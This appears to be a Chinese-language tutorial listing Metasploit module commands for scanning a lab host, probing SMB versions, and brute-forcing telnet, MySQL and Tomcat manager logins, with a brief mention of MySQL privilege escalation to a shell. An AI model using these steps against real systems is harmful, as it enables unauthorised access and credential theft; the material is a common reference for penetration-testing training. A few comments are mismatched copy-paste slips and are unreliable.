metasploit常用模块使用命令-信息收集

使用arp_sweep模块来发现存活的主机

search arp_sweep                               //查询此模块下的攻击模块

use   查询出来的攻击模块                   //加载攻击模块

show options                                       //查看一下该模块需要配置的选项参数

set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

exploit                                                 //进行攻击

使用Metasploit的SYN端口扫描器对单个主机进行一次简单的扫描

use auxiliary/scanner/portscan/syn     //加载SYN端口扫描器

show options                                       //查看一下该模块需要配置的选项参数

set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

exploit                                                 //进行攻击

使用smb_version模块对目标主机的系统版本进行探测

search smb_version                            //查询此模块下的攻击模块

use   查询出来的攻击模块                   //加载攻击模块

show options                                       //查看一下该模块需要配置的选项参数

set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

exploit                                                 //进行攻击

使用telnet_login模块对目标主机的telnet服务进行系统密码爆破

使用nmap扫描出开放的23端口,即可使用telnet模块进行爆破

search telnet_login                             //查询此模块下的攻击模块

use   查询出来的攻击模块                  //加载攻击模块

show options                                       //查看一下该模块需要配置的选项参数

set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

set PASS_FILE pass                          //使用set命令将PASS_FILE设置为使用文件名字为pass的密码本进行爆破

set USERNAME root                          //使用set命令将USERNAME设置用户名为root

使用mysql_login模块对目标主机的MySQL数据库进行爆破

search mysql_login                             //查询此模块下的攻击模块

use   查询出来的攻击模块                   //加载攻击模块

show options                                       //查看一下该模块需要配置的选项参数

set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

set PASS_FILE pass                          //使用set命令将PASS_FILE设置为使用文件名字为pass的密码本进行爆破

set USERNAME root                          //使用set命令将USERNAME设置用户名为root

查出密码后然后用mysql_enum查看数据库信息

mysql_mof模块进行提权 ,获得shell,低于mysql5.6版本

使用tomcat_mgr_login模块对目标主机的8180端口,也就是tomcat中间件进行登陆爆破

search tomcat_mgr_login                    //查询此模块下的攻击模块

use   查询出来的攻击模块                   //加载攻击模块

show options                                       //查看一下该模块需要配置的选项参数

set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

set USERNAME tomcat                      //使用set命令将USERNAME设置用户名为root           USER_FILE

set PASSWORD tomcat                      //使用set命令将PASSWORD设置用户名为root           PASS_FILE

你可能感兴趣的:(metasploit常用模块使用命令-信息收集)